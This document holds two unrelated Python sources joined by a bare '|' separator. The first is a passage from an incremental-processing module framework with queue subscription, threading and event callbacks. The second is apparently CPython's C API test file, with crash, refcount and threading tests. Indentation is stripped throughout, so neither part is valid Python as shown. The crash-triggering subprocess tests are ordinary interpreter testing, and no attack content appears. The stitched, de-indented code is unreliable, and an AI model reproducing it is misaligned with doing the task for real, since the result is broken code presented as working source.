"""Append an update message to all queues.
If update_message is None or there are no IUs in the update message, the method
returns without doing anything.
Args:
update_message (UpdateMessage): The update message that should be added to
all output queues. May be None.
"""
if not update_message:
return
if not isinstance(update_message, UpdateMessage):
raise TypeError(
"Update message is of type %s but should be UpdateMessage"
% type(update_message)
)
for q in self._right_buffers:
q.put(copy.copy(update_message))
def subscribe(self, module, q=None):
"""Subscribe a module to the queue.
It returns a queue where the IUs for that module are placed. The queue
is not shared with other modules. By default this method creates a new
queue, but it may use an alternative queue given in parameter 'q'.
Args:
module (AbstractModule): The module that wants to subscribe to the
output of the module.
q (IncrementalQueue): A optional queue that is used. If q is None,
the a new queue will be used"""
if not q:
self.event_call(self.EVENT_SUBSCRIBE, {"module": module})
q = self.queue_class(self, module)
module.add_left_buffer(q)
self._right_buffers.append(q)
return q
def remove_from_rb(self, module):
"""Removes the connection to a module from the right buffers.
This method removes all queues between this module and the given module
from the right buffer of this module and the left buffer of the given
module.
This method stops the execution of the module.
Args:
module: A module that is subscribed to this module
"""
if self.is_running:
self.stop()
# We get a copy of the buffers because we are mutating it
rbs = self.right_buffers()
for buffer in rbs:
if buffer.consumer == module:
buffer.remove()
def remove_from_lb(self, module):
"""Removes the connection to a module from the left buffers.
This method removes all queues between this module and the given module
from the left buffer of this module and the right buffer of the given
module.
This method stops the execution of the module.
Args:
module: A module that this module is subscribed to
"""
if self.is_running:
self.stop()
# We get a copy of the buffers because we are mutating it
lbs = self.left_buffers()
for buffer in lbs:
if buffer.producer == module:
buffer.remove()
def remove(self):
"""Removes all connections to all modules.
This methods removes all queues from the left buffer and right buffer.
The queues are also removed from the buffers of the connected modules.
This method can be used to remove a module completely from a network.
This method stops the execution of the module.
"""
if self.is_running:
self.stop()
lbs = self.left_buffers()
rbs = self.right_buffers()
for buffer in lbs:
buffer.remove()
for buffer in rbs:
buffer.remove()
def process_update(self, update_message):
"""Processes the update message given and returns a new update message that can
be appended to the output queues.
Note that the incremental units in the update message that is returned should be
created by the create_iu method so that they have correct references to the
previous incremental units generated by this module and the IUs that they are
based on.
It is important that the process_update method processes the update messages
in a timely manner (in regards to the production of update messages from the
preceding module) so that the incremental queues do not overflow.
Args:
update_message (UpdateMEssage): The update message that should be processed
by the module.
Returns:
UpdateMessage: An update message that is produced by this module based
on the incremental units that were given. May be None.
"""
raise NotImplementedError()
def _run(self):
self.prepare_run()
self.is_running = True
while self.is_running:
for buffer in self._left_buffers:
with self.mutex:
try:
update_message = buffer.get(timeout=self.QUEUE_TIMEOUT)
except queue.Empty:
update_message = None
if update_message:
if not update_message.has_valid_ius(self.input_ius()):
raise TypeError("This module can't handle this type of IU")
output_message = self.process_update(update_message)
update_message.set_processed(self)
for input_iu in update_message.incremental_units():
self.event_call(self.EVENT_PROCESS_IU, {"iu": input_iu})
self.event_call(
self.EVENT_PROCESS_UPDATE_MESSAGE,
{"update_message": update_message},
)
if output_message:
if output_message.has_valid_ius(self.output_iu()):
self.append(output_message)
else:
raise TypeError(
"This module should not produce IUs of this type."
)
self.shutdown()
def is_valid_input_iu(self, iu):
"""Return whether the given IU is a valid input IU.
Valid is defined by the list given by the input_ius function. The given
IU must be one of the types defined in that list or be a subclass of it.
Args:
iu (IncrementalUnit): The IU to be checked.
Raises:
TypeError: When the given object is not of type IncrementalUnit.
Returns:
bool: Whether the given iu is a valid one for this module.
"""
if not isinstance(iu, IncrementalUnit):
raise TypeError("IU is of type %s but should be IncrementalUnit" % type(iu))
for valid_iu in self.input_ius():
if isinstance(iu, valid_iu):
return True
return False
def setup(self):
"""This method is called before the module is run. This method can be
used to set up the pipeline needed for processing the IUs.
However, after the setup method is called, the module may not
immediately be run. For code that should be executed immediately before
a module is run use the `prepare_run` method.
"""
pass
def prepare_run(self):
"""A method that is executed just before the module is being run.
While this method may seem similar to `setup`, it is called immediately
before the run routine. This method may be used in producing modules to
initialize the generation of output IUs. Other than the `setup` method,
this method makes sure that other modules in the network are also
already setup.
"""
pass
def shutdown(self):
"""This method is called before the module is stopped. This method can
be used to tear down the pipeline needed for processing the IUs."""
pass
def run(self, run_setup=True):
"""Run the processing pipeline of this module in a new thread. The
thread can be stopped by calling the stop() method.
Args:
run_setup (bool): Whether or not the setup method should be executed
before the thread is started.
"""
if run_setup:
self.setup()
for q in self.right_buffers():
with q.mutex:
q.queue.clear()
t = threading.Thread(target=self._run)
t.start()
self.event_call(self.EVENT_START)
def stop(self, clear_buffer=True):
"""Stops the execution of the processing pipeline of this module at the
next possible point in time. This may be after the next incoming IU is
processed."""
self.is_running = False
if clear_buffer:
for buffer in self.right_buffers():
while not buffer.empty():
buffer.get()
self.event_call(self.EVENT_STOP)
def create_iu(self, grounded_in=None):
"""Creates a new Incremental Unit that contains the information of the
creator (the current module), the previous IU that was created in this
module and the iu that it is based on.
Do not discard (as in not using) any IU that was created by this method,
because it will alreade have been introduced into the chain of IUs of
this module!
Args:
grounded_in (IncrementalUnit): The incremental unit that the new
unit is based on. May be None.
Returns:
IncrementalUnit: A new incremental unit with correct pointer to
unit it is grounded in and to the previous IU that was generated by
this module.
"""
new_iu = self.output_iu()(
creator=self,
iuid=self.iu_counter,
previous_iu=self._previous_iu,
grounded_in=grounded_in,
)
self.iu_counter += 1
self._previous_iu = new_iu
return new_iu
def latest_iu(self):
"""Provides reading access to the latest incremental unit that was
produced by this module.
Thus, the information received by this method might be out of date or
completely wrong (in case where a not yet initialized IU is returned).
The iu returned should not be modified in any way, because it could
still be processed by a module.
Return:
(IncrementalUnit): The latest IU that was produced by the module.
"""
return self._previous_iu
def __repr__(self):
return self.name()
def event_subscribe(self, event_name, callback):
"""
Subscribe a callback to an event with the given name. If tge event name
is "*", then the callback will be called after every event.
The callback function is given three arguments: the module that
triggered the event (AbstractModule), the name of the event (str) and a
dict (dict) that may contain data relevant to the event.
Args:
event_name (str): The name of the event to subscribe to
callback (function): A function that is called once the event occurs
"""
if not self.events.get(event_name):
self.events[event_name] = []
self.events[event_name].append(callback)
def event_call(self, event_name, data={}):
"""
Calls all callback functions that are subscribed to the given event
name with some data attached to it. The data is optional but should stay
consistent with each call of the same event.
If * is passed as the event name, no callback function is called.
Event name should be a unique identifier to the event. "*" is not
allowed as an event name.
Args:
event_name (str): The name of the event (not "*")
data (dict): Optionally some data that is relevant to the event.
"""
if data is None:
data = {}
if event_name == "*":
return
if self.events.get(event_name):
for callback in self.events[event_name]:
threading.Thread(target=callback, args=(self, event_name, data)).start()
if self.events.get("*"):
for callback in self.events["*"]:
threading.Thread(target=callback, args=(self, event_name, data)).start()
class AbstractProducingModule(AbstractModule):
"""An abstract producing module that is able to incrementally process data.
The producing module has no input queue and thus does not wait for any
input. The producing module is called continously and may return new output
when it becomes available.
"""
@staticmethod
def name():
raise NotImplementedError()
@staticmethod
def description():
raise NotImplementedError()
@staticmethod
def input_ius():
return []
@staticmethod
def output_iu():
raise NotImplementedError()
def __init__(self, queue_class=IncrementalQueue, **kwargs):
super().__init__(queue_class=IncrementalQueue, **kwargs)
def _run(self):
self.prepare_run()
self.is_running = True
while self.is_running:
with self.mutex:
output_message = self.process_update(None)
if output_message:
if output_message.has_valid_ius(self.output_iu()):
self.append(output_message)
else:
raise TypeError(
"This module should not produce IUs of this type."
)
self.shutdown()
def process_update(self, update_message):
raise NotImplementedError()
class AbstractConsumingModule(AbstractModule):
"""An abstract consuming module that is able to incrementally process data.
The consuming module consumes IUs but does not return any data.
"""
@staticmethod
def name():
raise NotImplementedError()
@staticmethod
def description():
raise NotImplementedError()
@staticmethod
def input_ius():
raise NotImplementedError()
@staticmethod
def output_iu():
return None
def subscribe(self, module, q=None):
raise ValueError("Consuming Modules do not produce any output")
def process_update(self, update_message):
raise NotImplementedError()
class AbstractTriggerModule(AbstractProducingModule):
"""An abstract trigger module that produces an update message once a trigger method
is called. Unless the module is triggered no updates are produced"""
@staticmethod
def name():
raise NotImplementedError()
@staticmethod
def description():
raise NotImplementedError()
@staticmethod
def input_ius():
return []
@staticmethod
def output_iu():
raise NotImplementedError()
def __init__(self, queue_class=IncrementalQueue, **kwargs):
super().__init__(queue_class=IncrementalQueue, **kwargs)
def _run(self):
self.prepare_run()
self.is_running = True
while self.is_running:
with self.mutex:
time.sleep(0.05)
self.shutdown()
def process_update(self, update_message):
return None
def trigger(self, data={}, update_type=UpdateType.ADD):
"""The trigger method that should produce an update message and append it to the
right buffer
Args:
data (dict): A dictionary with data that can be used for the trigger
update_type (UpdateType): The update type that the IU should have. Default
is UpdateType.ADD
"""
raise NotImplementedError()
|
test_capi.py | # Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from collections import OrderedDict
import _thread
import importlib.machinery
import importlib.util
import os
import pickle
import random
import re
import subprocess
import sys
import textwrap
import threading
import time
import unittest
import weakref
from test import support
from test.support import MISSING_C_DOCSTRINGS
from test.support import import_helper
from test.support import threading_helper
from test.support import warnings_helper
from test.support.script_helper import assert_python_failure, assert_python_ok
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
try:
import _testmultiphase
except ImportError:
_testmultiphase = None
# Skip this test if the _testcapi module isn't available.
_testcapi = import_helper.import_module('_testcapi')
import _testinternalcapi
# Were we compiled --with-pydebug or with #define Py_DEBUG?
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def decode_stderr(err):
return err.decode('utf-8', 'replace').replace('\r', '')
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
@support.requires_subprocess()
def test_no_FatalError_infinite_loop(self):
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error: '
b'PyThreadState_Get: '
b'the function must be called with the GIL held, '
b'but the GIL is released '
b'(the current Python thread state is NULL)'),
err)
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.assertTrue(False)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
@unittest.skipIf(MISSING_C_DOCSTRINGS,
"Signature information for builtins requires docstrings")
def test_docstring_signature_parsing(self):
self.assertEqual(_testcapi.no_docstring.__doc__, None)
self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
self.assertEqual(_testcapi.docstring_empty.__doc__, None)
self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
self.assertEqual(_testcapi.docstring_no_signature.__doc__,
"This docstring has no signature.")
self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
"docstring_with_invalid_signature($module, /, boo)\n"
"\n"
"This docstring has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
"docstring_with_invalid_signature2($module, /, boo)\n"
"\n"
"--\n"
"\n"
"This docstring also has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_signature.__doc__,
"This docstring has a valid signature.")
self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__doc__, None)
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__text_signature__,
"($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
"\nThis docstring has a valid signature and some extra newlines.")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
"($module, /, parameter)")
def test_c_type_with_matrix_multiplication(self):
M = _testcapi.matmulType
m1 = M()
m2 = M()
self.assertEqual(m1 @ m2, ("matmul", m1, m2))
self.assertEqual(m1 @ 42, ("matmul", m1, 42))
self.assertEqual(42 @ m1, ("matmul", 42, m1))
o = m1
o @= m2
self.assertEqual(o, ("imatmul", m1, m2))
o = m1
o @= 42
self.assertEqual(o, ("imatmul", m1, 42))
o = 42
o @= m1
self.assertEqual(o, ("matmul", 42, m1))
def test_c_type_with_ipow(self):
# When the __ipow__ method of a type was implemented in C, using the
# modulo param would cause segfaults.
o = _testcapi.ipowType()
self.assertEqual(o.__ipow__(1), (1, None))
self.assertEqual(o.__ipow__(2, 2), (2, 2))
def test_return_null_without_error(self):
# Issue #23571: A function must not return NULL without setting an
# error
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_null_without_error()
""")
rc, out, err = assert_python_failure('-c', code)
err = decode_stderr(err)
self.assertRegex(err,
r'Fatal Python error: _Py_CheckFunctionResult: '
r'a function returned NULL without setting an exception\n'
r'Python runtime state: initialized\n'
r'SystemError: <built-in function return_null_without_error> '
r'returned NULL without setting an exception\n'
r'\n'
r'Current thread.*:\n'
r' File .*", line 6 in <module>\n')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_null_without_error()
self.assertRegex(str(cm.exception),
'return_null_without_error.* '
'returned NULL without setting an exception')
def test_return_result_with_error(self):
# Issue #23571: A function must not return a result with an error set
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_result_with_error()
""")
rc, out, err = assert_python_failure('-c', code)
err = decode_stderr(err)
self.assertRegex(err,
r'Fatal Python error: _Py_CheckFunctionResult: '
r'a function returned a result with an exception set\n'
r'Python runtime state: initialized\n'
r'ValueError\n'
r'\n'
r'The above exception was the direct cause '
r'of the following exception:\n'
r'\n'
r'SystemError: <built-in '
r'function return_result_with_error> '
r'returned a result with an exception set\n'
r'\n'
r'Current thread.*:\n'
r' File .*, line 6 in <module>\n')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_result_with_error()
self.assertRegex(str(cm.exception),
'return_result_with_error.* '
'returned a result with an exception set')
def test_getitem_with_error(self):
# Test _Py_CheckSlotResult(). Raise an exception and then calls
# PyObject_GetItem(): check that the assertion catches the bug.
# PyObject_GetItem() must not be called with an exception set.
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.getitem_with_error({1: 2}, 1)
""")
rc, out, err = assert_python_failure('-c', code)
err = decode_stderr(err)
if 'SystemError: ' not in err:
self.assertRegex(err,
r'Fatal Python error: _Py_CheckSlotResult: '
r'Slot __getitem__ of type dict succeeded '
r'with an exception set\n'
r'Python runtime state: initialized\n'
r'ValueError: bug\n'
r'\n'
r'Current thread .* \(most recent call first\):\n'
r' File .*, line 6 in <module>\n'
r'\n'
r'Extension modules: _testcapi \(total: 1\)\n')
else:
# Python built with NDEBUG macro defined:
# test _Py_CheckFunctionResult() instead.
self.assertIn('returned a result with an exception set', err)
def test_buildvalue_N(self):
_testcapi.test_buildvalue_N()
def test_set_nomemory(self):
code = """if 1:
import _testcapi
class C(): pass
# The first loop tests both functions and that remove_mem_hooks()
# can be called twice in a row. The second loop checks a call to
# set_nomemory() after a call to remove_mem_hooks(). The third
# loop checks the start and stop arguments of set_nomemory().
for outer_cnt in range(1, 4):
start = 10 * outer_cnt
for j in range(100):
if j == 0:
if outer_cnt != 3:
_testcapi.set_nomemory(start)
else:
_testcapi.set_nomemory(start, start + 1)
try:
C()
except MemoryError as e:
if outer_cnt != 3:
_testcapi.remove_mem_hooks()
print('MemoryError', outer_cnt, j)
_testcapi.remove_mem_hooks()
break
"""
rc, out, err = assert_python_ok('-c', code)
lines = out.splitlines()
for i, line in enumerate(lines, 1):
self.assertIn(b'MemoryError', out)
*_, count = line.split(b' ')
count = int(count)
self.assertLessEqual(count, i*5)
self.assertGreaterEqual(count, i*5-1)
def test_mapping_keys_values_items(self):
class Mapping1(dict):
def keys(self):
return list(super().keys())
def values(self):
return list(super().values())
def items(self):
return list(super().items())
class Mapping2(dict):
def keys(self):
return tuple(super().keys())
def values(self):
return tuple(super().values())
def items(self):
return tuple(super().items())
dict_obj = {'foo': 1, 'bar': 2, 'spam': 3}
for mapping in [{}, OrderedDict(), Mapping1(), Mapping2(),
dict_obj, OrderedDict(dict_obj),
Mapping1(dict_obj), Mapping2(dict_obj)]:
self.assertListEqual(_testcapi.get_mapping_keys(mapping),
list(mapping.keys()))
self.assertListEqual(_testcapi.get_mapping_values(mapping),
list(mapping.values()))
self.assertListEqual(_testcapi.get_mapping_items(mapping),
list(mapping.items()))
def test_mapping_keys_values_items_bad_arg(self):
self.assertRaises(AttributeError, _testcapi.get_mapping_keys, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_values, None)
self.assertRaises(AttributeError, _testcapi.get_mapping_items, None)
class BadMapping:
def keys(self):
return None
def values(self):
return None
def items(self):
return None
bad_mapping = BadMapping()
self.assertRaises(TypeError, _testcapi.get_mapping_keys, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_values, bad_mapping)
self.assertRaises(TypeError, _testcapi.get_mapping_items, bad_mapping)
@unittest.skipUnless(hasattr(_testcapi, 'negative_refcount'),
'need _testcapi.negative_refcount')
def test_negative_refcount(self):
# bpo-35059: Check that Py_DECREF() reports the correct filename
# when calling _Py_NegativeRefcount() to abort Python.
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.negative_refcount()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err,
br'_testcapimodule\.c:[0-9]+: '
br'_Py_NegativeRefcount: Assertion failed: '
br'object has negative ref count')
def test_trashcan_subclass(self):
# bpo-35983: Check that the trashcan mechanism for "list" is NOT
# activated when its tp_dealloc is being called by a subclass
from _testcapi import MyList
L = None
for i in range(1000):
L = MyList((L,))
@support.requires_resource('cpu')
def test_trashcan_python_class1(self):
self.do_test_trashcan_python_class(list)
@support.requires_resource('cpu')
def test_trashcan_python_class2(self):
from _testcapi import MyList
self.do_test_trashcan_python_class(MyList)
def do_test_trashcan_python_class(self, base):
# Check that the trashcan mechanism works properly for a Python
# subclass of a class using the trashcan (this specific test assumes
# that the base class "base" behaves like list)
class PyList(base):
# Count the number of PyList instances to verify that there is
# no memory leak
num = 0
def __init__(self, *args):
__class__.num += 1
super().__init__(*args)
def __del__(self):
__class__.num -= 1
for parity in (0, 1):
L = None
# We need in the order of 2**20 iterations here such that a
# typical 8MB stack would overflow without the trashcan.
for i in range(2**20):
L = PyList((L,))
L.attr = i
if parity:
# Add one additional nesting layer
L = (L,)
self.assertGreater(PyList.num, 0)
del L
self.assertEqual(PyList.num, 0)
def test_heap_ctype_doc_and_text_signature(self):
self.assertEqual(_testcapi.HeapDocCType.__doc__, "somedoc")
self.assertEqual(_testcapi.HeapDocCType.__text_signature__, "(arg1, arg2)")
def test_null_type_doc(self):
self.assertEqual(_testcapi.NullTpDocType.__doc__, None)
def test_subclass_of_heap_gc_ctype_with_tpdealloc_decrefs_once(self):
class HeapGcCTypeSubclass(_testcapi.HeapGcCType):
def __init__(self):
self.value2 = 20
super().__init__()
subclass_instance = HeapGcCTypeSubclass()
type_refcnt = sys.getrefcount(HeapGcCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# Test that the type reference count is only decremented once
del subclass_instance
self.assertEqual(type_refcnt - 1, sys.getrefcount(HeapGcCTypeSubclass))
def test_subclass_of_heap_gc_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
class A(_testcapi.HeapGcCType):
def __init__(self):
self.value2 = 20
super().__init__()
class B(A):
def __init__(self):
super().__init__()
def __del__(self):
self.__class__ = A
A.refcnt_in_del = sys.getrefcount(A)
B.refcnt_in_del = sys.getrefcount(B)
subclass_instance = B()
type_refcnt = sys.getrefcount(B)
new_type_refcnt = sys.getrefcount(A)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
del subclass_instance
# Test that setting __class__ modified the reference counts of the types
self.assertEqual(type_refcnt - 1, B.refcnt_in_del)
self.assertEqual(new_type_refcnt + 1, A.refcnt_in_del)
# Test that the original type already has decreased its refcnt
self.assertEqual(type_refcnt - 1, sys.getrefcount(B))
# Test that subtype_dealloc decref the newly assigned __class__ only once
self.assertEqual(new_type_refcnt, sys.getrefcount(A))
def test_heaptype_with_dict(self):
inst = _testcapi.HeapCTypeWithDict()
inst.foo = 42
self.assertEqual(inst.foo, 42)
self.assertEqual(inst.dictobj, inst.__dict__)
self.assertEqual(inst.dictobj, {"foo": 42})
inst = _testcapi.HeapCTypeWithDict()
self.assertEqual({}, inst.__dict__)
def test_heaptype_with_negative_dict(self):
inst = _testcapi.HeapCTypeWithNegativeDict()
inst.foo = 42
self.assertEqual(inst.foo, 42)
self.assertEqual(inst.dictobj, inst.__dict__)
self.assertEqual(inst.dictobj, {"foo": 42})
inst = _testcapi.HeapCTypeWithNegativeDict()
self.assertEqual({}, inst.__dict__)
def test_heaptype_with_weakref(self):
inst = _testcapi.HeapCTypeWithWeakref()
ref = weakref.ref(inst)
self.assertEqual(ref(), inst)
self.assertEqual(inst.weakreflist, ref)
def test_heaptype_with_buffer(self):
inst = _testcapi.HeapCTypeWithBuffer()
b = bytes(inst)
self.assertEqual(b, b"1234")
def test_c_subclass_of_heap_ctype_with_tpdealloc_decrefs_once(self):
subclass_instance = _testcapi.HeapCTypeSubclass()
type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# Test that the type reference count is only decremented once
del subclass_instance
self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclass))
def test_c_subclass_of_heap_ctype_with_del_modifying_dunder_class_only_decrefs_once(self):
subclass_instance = _testcapi.HeapCTypeSubclassWithFinalizer()
type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer)
new_type_refcnt = sys.getrefcount(_testcapi.HeapCTypeSubclass)
# Test that subclass instance was fully created
self.assertEqual(subclass_instance.value, 10)
self.assertEqual(subclass_instance.value2, 20)
# The tp_finalize slot will set __class__ to HeapCTypeSubclass
del subclass_instance
# Test that setting __class__ modified the reference counts of the types
self.assertEqual(type_refcnt - 1, _testcapi.HeapCTypeSubclassWithFinalizer.refcnt_in_del)
self.assertEqual(new_type_refcnt + 1, _testcapi.HeapCTypeSubclass.refcnt_in_del)
# Test that the original type already has decreased its refcnt
self.assertEqual(type_refcnt - 1, sys.getrefcount(_testcapi.HeapCTypeSubclassWithFinalizer))
# Test that subtype_dealloc decref the newly assigned __class__ only once
self.assertEqual(new_type_refcnt, sys.getrefcount(_testcapi.HeapCTypeSubclass))
def test_heaptype_with_setattro(self):
obj = _testcapi.HeapCTypeSetattr()
self.assertEqual(obj.pvalue, 10)
obj.value = 12
self.assertEqual(obj.pvalue, 12)
del obj.value
self.assertEqual(obj.pvalue, 0)
def test_pynumber_tobase(self):
from _testcapi import pynumber_tobase
self.assertEqual(pynumber_tobase(123, 2), '0b1111011')
self.assertEqual(pynumber_tobase(123, 8), '0o173')
self.assertEqual(pynumber_tobase(123, 10), '123')
self.assertEqual(pynumber_tobase(123, 16), '0x7b')
self.assertEqual(pynumber_tobase(-123, 2), '-0b1111011')
self.assertEqual(pynumber_tobase(-123, 8), '-0o173')
self.assertEqual(pynumber_tobase(-123, 10), '-123')
self.assertEqual(pynumber_tobase(-123, 16), '-0x7b')
self.assertRaises(TypeError, pynumber_tobase, 123.0, 10)
self.assertRaises(TypeError, pynumber_tobase, '123', 10)
self.assertRaises(SystemError, pynumber_tobase, 123, 0)
def check_fatal_error(self, code, expected, not_expected=()):
with support.SuppressCrashReport():
rc, out, err = assert_python_failure('-sSI', '-c', code)
err = decode_stderr(err)
self.assertIn('Fatal Python error: test_fatal_error: MESSAGE\n',
err)
match = re.search(r'^Extension modules:(.*) \(total: ([0-9]+)\)$',
err, re.MULTILINE)
if not match:
self.fail(f"Cannot find 'Extension modules:' in {err!r}")
modules = set(match.group(1).strip().split(', '))
total = int(match.group(2))
for name in expected:
self.assertIn(name, modules)
for name in not_expected:
self.assertNotIn(name, modules)
self.assertEqual(len(modules), total)
def test_fatal_error(self):
# By default, stdlib extension modules are ignored,
# but not test modules.
expected = ('_testcapi',)
not_expected = ('sys',)
code = 'import _testcapi, sys; _testcapi.fatal_error(b"MESSAGE")'
self.check_fatal_error(code, expected, not_expected)
# Mark _testcapi as stdlib module, but not sys
expected = ('sys',)
not_expected = ('_testcapi',)
code = textwrap.dedent('''
import _testcapi, sys
sys.stdlib_module_names = frozenset({"_testcapi"})
_testcapi.fatal_error(b"MESSAGE")
''')
self.check_fatal_error(code, expected)
def test_pyobject_repr_from_null(self):
s = _testcapi.pyobject_repr_from_null()
self.assertEqual(s, '<NULL>')
def test_pyobject_str_from_null(self):
s = _testcapi.pyobject_str_from_null()
self.assertEqual(s, '<NULL>')
def test_pyobject_bytes_from_null(self):
s = _testcapi.pyobject_bytes_from_null()
self.assertEqual(s, b'<NULL>')
def test_Py_CompileString(self):
# Check that Py_CompileString respects the coding cookie
_compile = _testcapi.Py_CompileString
code = b"# -*- coding: latin1 -*-\nprint('\xc2\xa4')\n"
result = _compile(code)
expected = compile(code, "<string>", "exec")
self.assertEqual(result.co_consts, expected.co_consts)
def test_export_symbols(self):
# bpo-44133: Ensure that the "Py_FrozenMain" and
# "PyThread_get_thread_native_id" symbols are exported by the Python
# (directly by the binary, or via by the Python dynamic library).
ctypes = import_helper.import_module('ctypes')
names = []
# Test if the PY_HAVE_THREAD_NATIVE_ID macro is defined
if hasattr(_thread, 'get_native_id'):
names.append('PyThread_get_thread_native_id')
# Python/frozenmain.c fails to build on Windows when the symbols are
# missing:
# - PyWinFreeze_ExeInit
# - PyWinFreeze_ExeTerm
# - PyInitFrozenExtensions
if os.name != 'nt':
names.append('Py_FrozenMain')
for name in names:
with self.subTest(name=name):
self.assertTrue(hasattr(ctypes.pythonapi, name))
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l[0] has grown to 10
count = 0
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
threads = [threading.Thread(target=self.pendingcalls_thread,
args=(context,))
for i in range(context.nThreads)]
with threading_helper.start_threads(threads):
self.pendingcalls_wait(context.l, n, context)
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
